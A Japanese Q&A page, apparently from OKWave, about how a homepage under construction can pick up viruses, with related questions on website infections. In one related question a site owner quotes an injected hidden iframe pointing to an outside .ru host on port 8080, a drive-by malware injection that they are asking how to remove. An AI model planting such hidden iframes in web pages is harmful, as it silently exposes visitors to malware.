• 締切済み

ホームページの管理とウイルスの進入について

現在、知人に頼まれ初めてのホームページを作成中なのですが ホームページ作成など無縁と思っていたときに聞いた話なので 質問が曖昧になりますがお分かりになる方がありましたらご回答願います。  「自身のホームページの構造などを第三者にチェックしてもらおうと、   第三者の PCで開こうとするときにウイルスが入ってくる。」 これはどのような状況なのでしょう? ホームページ公開後の管理は一台の PCで行わないとウイルス感染しやすいという事でしょうか。 知人の専門家から聞いた話なのですが、アメリカ在住なので確かめられなくて・・・

みんなの回答

  • violet430
  • ベストアンサー率36% (27472/75001)
回答No.1

>ホームページ公開後の管理は一台の PCで行わないとウイルス感染しやすいという事でしょうか。 それは違います。 そのコメントで言いたかったのは、サイトにウイルスが潜んでいる場合、それを編集のためにデータをダウンロードすると、そこでウイルスに感染する恐れがある、と言う意味ではないかと推測します。 あと、これとは逆に、編集者のパソコンがウイルスに感染していた場合、編集後のデータをアップロードするとサイトがウイルスに感染してしまう可能性もありますね。 パソコンだけでなく、サイト側でのウイルス対策が重要になります。

meah1835
質問者

お礼

ご返答があるか待ちましたが やはりこれ以上の回答は見込めそうにありませんね、締め切ります。

meah1835
質問者

補足

>サイトにウイルスが潜んでいる場合 >編集者のパソコンがウイルスに感染していた場合  などについては、質問文の話以前に聞いております、また検索でも多くのものを参照できますが 今回の質問では、ホームページを公開するのは私ではなく友人(企業者)です。 しかしながら、公開後に手直し・追加記載などをする必要があった時、ウイルスの潜入を防ぐ為の心得をご教授願いたいのですが・・・

関連するQ&A

  • ホームページだけウイルス感染??

    近頃ホームページを開設したのですが、HPを見た知人(ウイルス対策済み)より、『パソコンを開いて一番にこのホームページを見たら、“ウイルス駆除しました”って表示が出た」との連絡がありました。プロバイダー提供の無料でつくれるHPですが、HPの作成やアップ作業に使用しているパソコンはウイルス対策しているんです。どこに原因があるのか、本当に感染しているのか、全く不明で困っています。 ホームページだけ感染するなんてことあるんでしょうか??ご存知の方がいらっしゃいましたら、是非教えてください!!お願いします!

  • ホームページにウィルスは感染する?

    ホームページをいくつか持っています。 このホームページ自体にウィルスを感染させることが可能だと聞いたことがありますが、本当でしょうか? 第三者が私の作成したHPにウィルスを感染させてしまうことができるのでしょうか? そして、もし感染した場合、除去の仕方はどうしたらよいのですか? 自分で作成したときのフォルダー、ファイルを全てスキャンして、削除してからアップロードすればそれでまたクリーンになるものなのでしょうか? 宜しくお願いします。

  • 公開HPのウィルス感染をチェックできるのでしょうか?

    はじめまして。 私は自営業をしておりまして、自作のHPを公開しております。 知人が見たところ「ウィルスに感染している可能性があるが、それでもページを開きますか?」というような表示がでたそうです 自分のPCは感染していないのですが、HPのウィルスを チェックしたりできるのでしょうか? PCには「ウィルスセキュリティー」がはいっています。 操作に不慣れなもので、変な質問かもしれませんが よろしくお願いいたします。

  • ホームページを見ただけでウィルス感染することは?

    どこか特定のホームページをIEなどのブラウザで見ただけで、ウィルスに感染するってことはありうるのでしょうか? 前にIEにセキュリティーホールが見つかったとか、MSNがウィルスに感染した等という話を聞いたことがあるので、ホームページを見ただけでウィルス感染することは、ありうると思ってよいのでしょうか?

  • ホームページのセキュリティ管理

    ホームページのセキュリティ管理について教えてください。 自分のパソコンは、セキュリティ管理専門のソフトを利用することである程度は防御することができます。ところが、 「公開するホームページとなると、いろいろな問題が生じます。特に、何処のサイトから公開しているかが重要です。そのサイトのセキュリティ管理レベルが問われます」という指摘を受けました。(私は格安のレンタルサーバーでURLを登録しています) 「最近のセキュリティ管理ソフトは「URL」毎に検査できる機能がある」そうです。私はIBM社のホームページビルダーで、ホームページを作っていますが、ビルダーにもその機能があるかも?とのことでした。 ホームページのセキュリティ管理とはどんなことを言うのでしょうか?

  • ホームページのウイルス?スパム?について・・・

    ホームページを作成して約2年ほど公開しています。 ここ1ヵ月もたたないぐらいから作成したホームページを閲覧するとページの表示のされかたがおかしく、ページのトップがmargin-top200pxぐらい自動でかかっています。 しかもウイルスソフトにも引っかかります。 自分の記入ミスだと思い、確認したのですが、記述に間違いはなくページのtopにmargin-top200pxの記述はしていませんでした。 不気味に思ったので、サーバーにあがっているファイルを一時削除してもう一度アップしなおしました。 ところが数日後また同じ現象が起きていました。 毎回ウイルスソフトが「アクセスしたファイルは感染しています」と表示されます。 おかしいと思ったので、表示されているページのソースをブラウザ上からみたところ<html><head></head><body>のところに <iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe> という記述がありました。 これを調べたのですが、何も得られず、削除をしても数日後には復活しています。 また、必ずindex.htmlファイルが感染しているようです。 他のページ(member.html)などは感染していませんでした。 友達のPC(ウイルスバスター)でも引っかかると言っていました。 自分のはウイルスソフトはAVGを使用しています。 質問内容はまずどのようにしたら感染しているものを削除できるのでしょうか? また、<iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe>はなんでしょうか? ご教授お願いします。

  • ホームページのウイルス?

    最近ホームページを立ち上げました。 OSはMAC10.3。FTP送信ソフトはFTECHを使っています。 それで、リンクをあるサイトへお願いしたのですが、管理者がページを見たところ、あるページへ行くとウイルス対策ソフト(ノートンだそうです)の警告が表示され遮断されてしまうそうです。 スクリプト等、特に変わったことをしているわけでもありません。タグで単純に組んであるだけです。 自分のパソコンが感染していなくても、ページ??だけウイルスに感染しているのでしょうか? それともタグの組み方などでバグが発生したりするのでしょうか? よろしければ、お教え下さい。

    • ベストアンサー
    • Mac
  • ホームページ開設の際のウィルス対策

    ホームページを作成し、ドメインを取得、レンタルサーバーも借りました。いよいよ公開できる段階なのですが、開設するホームページのウィルス対策が必要なのでは?と気づきました。 現在は、E-mailに関しては、OCNのウィルスチェックを利用し、その他のコンピュータに関しては、ノートンのアンチウィルスを使用しています。アンチウィルスはホームページとHP用の新しいメールアドレスの方も網羅してくれるのでしょうか? あるいは、新しくウィルスソフトを追加する必要があるのか、もしそうであればどんなソフトが良いかをアドバイスいただきたいのですが。全くの素人ですので、どうかよろしくお願いいたします。

  • ウイルスについて教えてください

    パソコン初心者です。ウイルスについてお聞きしたいことがあります。 1.インターネット上のホームページをダウンロードしただけでウイルスに感染してしまうことはあるのですか? 2.感染した場合にウイルスの対策ソフトで確実に発見・駆除できるのでしょうか? 3.winnyなどで情報が漏れたとよく聞きますがどうしてそれが分かるのですか?(どこに公開されているのですか?) よろしくお願いします。

  • ウイルスに感染しているのにウイルスバスターが検知しない

    はじめまして、私は今ホームページを作成しています。 なんとか形になったのでサイトを立ち上げ、知人に見て もらったところ、ウイルスにかかっていると指摘され、 オンラインスキャンしたところ、レッドロフに感染して いました。これを機に、ウイルスバスターを購入、ウイルスは全て駆除、WindowsUpdateをし、もう一度サイトを 作り直し、もう一度その知人に見てもらいました。すると まだ感染していると言われました。しかし、私のパソコンに入れてあるウイルスバスターは何の反応もしませんし、 オンラインスキャンしても感染していません。でも、ソースを見てみるとレッドロフにやはり感染していました。そのページのソースをいじることで直りましたがまたこういうことがあると困りますし、気になります。 ウイルスに感染しているのに検知しない、これは私が何か気付かずに設定をいじってしまっているからなのでしょうか、それとも会社に相談した方がいいのでしょうか? お返事、お待ちしています。

専門家に質問してみよう